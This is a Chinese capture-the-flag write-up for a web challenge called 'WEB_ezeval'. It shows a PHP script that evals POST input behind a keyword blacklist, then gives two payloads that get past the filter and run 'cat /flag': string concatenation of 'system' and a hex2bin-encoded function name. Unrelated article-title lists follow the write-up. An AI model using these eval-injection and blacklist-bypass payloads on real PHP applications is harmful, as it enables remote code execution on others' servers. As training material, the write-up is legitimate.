[WEB_ezeval]
题目:
打开环境,得到:

<?php
highlight_file(__FILE__);
$cmd=$_POST['cmd'];
$cmd=htmlspecialchars($cmd);
$black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','assert','exec','cookie','$','include','var','print','scan','decode','system','func','ini_','passthru','pcntl','open','link','log','current','local','source','require','contents');
$cmd = str_ireplace($black_list,"BMZCTF",$cmd);
eval($cmd);?>

接下来进行代码审计:
这时很简单的一个黑名单,有很多种办法都可以绕过,像什么字符串拼接,或者编码等绕过

0x01
字符串拼接:

在php中,字符串使用点号来连接,故可以使用点号来进行绕过

构造payload:

cmd=(s.y.s.t.e.m)('cat /flag');

获得输出:

0x02
使用编码绕过

在php里将16进制转换成字符串的函数是hex2bin,故可以用这种方式来进行绕过

payload:

cmd=hex2bin('73797374656D')('cat /flag');

即可得到flag:

这道题比较简单,就不做过多解释了

[WEB_ezeval]相关推荐

最新文章

  1. GitHub标星2000+,如何用30天啃完TensorFlow2.0?
  2. sd-wan公司组网解决方案效果如何?
  3. Vue3导入Vue-router报错:Uncaught SyntaxError: The requested module does not provide
  4. gzip,bzip2压缩工具及tar打包工具
  5. Angular Reactive Form 的一个具体使用例子
  6. 什么是转向灯?使用转向灯有何技巧?
  7. mysql applier_MySQL推出Applier,可实时复制数据到Hadoop-阿里云开发者社区
  8. FJ集团企业级邮件服务器——Exchange服务器安装与配置(边缘传输服务器)
  9. NetCore 2.0 + Swagger 的WebAPI 模板例子
  10. .NET开发相关技术
  11. 快狗打车上市:市值超130亿港元 姚劲波与陈小华收获IPO
  12. 红警2(红色警戒)之尤里的复仇 局域网对战联机方法
  13. 如何使用Easy-POI导入复杂表头的Excel报表(含源码级分析)
  14. Intel服务器CPU背面信息,涨知识:英特尔服务器CPU编号是啥意思?
  15. 阿里巴巴年终JAVA岗发布+最新面试手册(P5-P7)
  16. 苹果CMS插件-苹果CMS必备插件
  17. netmq VS redis 订阅发布性能研究
  18. 用计算机语言写结婚祝福语,抖音很火的一到10结婚祝福语
  19. 懒人之家-QQ客服右侧
  20. js怎么获取设备的地理位置

热门文章

  1. 复旦计算机考研英语,我收集的近几年复旦计算机复试笔试题
  2. 爱尔威火星车 AirWheel 电动独轮车
  3. Think in automotive Ethernet Topology
  4. codechef November Challenge 2017解题报告
  5. python判断两个列表是否相同_如何检查两个元组列表是否相同
  6. wolframalpha最新版_Wolfram Alpha安装包-数学工具wolfram alpha最新版1.4.4.2018021301下载_飞翔下载...
  7. 即将取代Maven和Gradle的新一代更强更快的构建工具(至尊典藏版)
  8. Python实现ALO蚁狮优化算法优化支持向量机回归模型(SVR算法)项目实战
  9. 织梦DedeCMS在自定义表单里加入验证码的方法
  10. 超经典爆笑的人生格言